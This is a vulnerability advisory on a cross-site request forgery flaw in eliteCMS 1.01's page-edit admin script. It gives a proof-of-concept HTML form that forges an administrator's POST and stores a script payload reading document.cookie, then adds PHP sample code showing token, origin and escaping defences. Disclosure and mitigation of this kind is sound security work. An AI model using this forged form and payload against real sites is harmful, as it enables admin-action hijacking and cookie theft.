XSRF (CSRF) in eliteCMS

Vulnerability ID: HTB22355
Reference: http://www.htbridge.ch/advisory/xsrf_csrf_in_elitecms.html
Product: eliteCMS
Vendor: Elite Graphix
Vulnerable Version: 1.01 and Probably Prior Versions
Vendor Notification: 19 April 2010
Vulnerability Type: CSRF (Cross-Site Request Forgery)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Low
Credit: High-Tech Bridge SA (http://www.htbridge.ch/)

Vulnerability Details:
The vulnerability exists because the "/admin/edit_page.php" script fails to properly verify the source of the HTTP request, so a POST submitted from a third-party page is processed as if the logged-in administrator had sent it.

Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

An attacker can use a browser to exploit this vulnerability. The following PoC is available:

<form action="http://www.example.com/admin/edit_page.php?page=1" name="frm" method="post">
<input name="title" type="hidden" value="Home" />
<input name="keywords" type="hidden" value="eliteCMS, Elite CMS" />
<input name="description" type="hidden" value='"><script>alert(document.cookie)</script>' />
<input name="menu_name" type="hidden" value="Home" />
<input name="position" type="hidden" value="1" />
<input name="active" type="hidden" value="1" />
<input name="home_page" type="hidden" value="1" />
<input name="sidebar" type="hidden" value="1" />
<input name="sidebar_align" type="hidden" value="left" />
<input name="contact_form" type="hidden" value="0" />
<input type="submit" name="submit" value="Update Page" />
</form>
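The missing check described above is a request-origin check on the edit handler. The following is an added example of how such a check is done with a synchronizer token plus output escaping; it is not eliteCMS code, the function names are hypothetical, and only the field names and the payload are taken from the advisory.

```php
<?php
// Added example (not eliteCMS code): anti-CSRF token handling for a
// page-edit handler such as /admin/edit_page.php. Requires PHP 7+.
session_start();

// Issue one random token per session and embed it in the legitimate form.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// A forged cross-site POST (like the PoC form) cannot read the session token,
// so it fails this check. hash_equals() compares in constant time.
function csrf_check(array $post): bool {
    $sent = $post['csrf_token'] ?? '';
    return is_string($sent)
        && !empty($_SESSION['csrf_token'])
        && hash_equals($_SESSION['csrf_token'], $sent);
}

// Defence in depth: a cross-site submission carries a foreign Origin/Referer.
// An absent header is tolerated because the token check above still applies.
function same_origin(string $host): bool {
    $origin = $_SERVER['HTTP_ORIGIN'] ?? $_SERVER['HTTP_REFERER'] ?? '';
    if ($origin === '') {
        return true;
    }
    return strcasecmp((string) parse_url($origin, PHP_URL_HOST), $host) === 0;
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!csrf_check($_POST) || !same_origin($_SERVER['HTTP_HOST'] ?? '')) {
        http_response_code(403);
        exit('Request rejected: missing or invalid anti-CSRF token.');
    }
    // ... update the page record (title, keywords, description, ...) here ...
}

// Constructed sample record holding the advisory's description payload.
$page = ['description' => '"><script>alert(document.cookie)</script>'];
// Escape on output so a stored payload renders as text instead of executing.
$description = htmlspecialchars($page['description'], ENT_QUOTES | ENT_HTML5, 'UTF-8');
?>
<form action="/admin/edit_page.php?page=1" method="post">
  <input type="hidden" name="csrf_token" value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') ?>" />
  <input type="text" name="description" value="<?= $description ?>" />
  <input type="submit" name="submit" value="Update Page" />
</form>
```

With this in place, the PoC form is rejected with HTTP 403 because it carries no valid csrf_token, and even a previously stored description payload is rendered inert by the output escaping.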
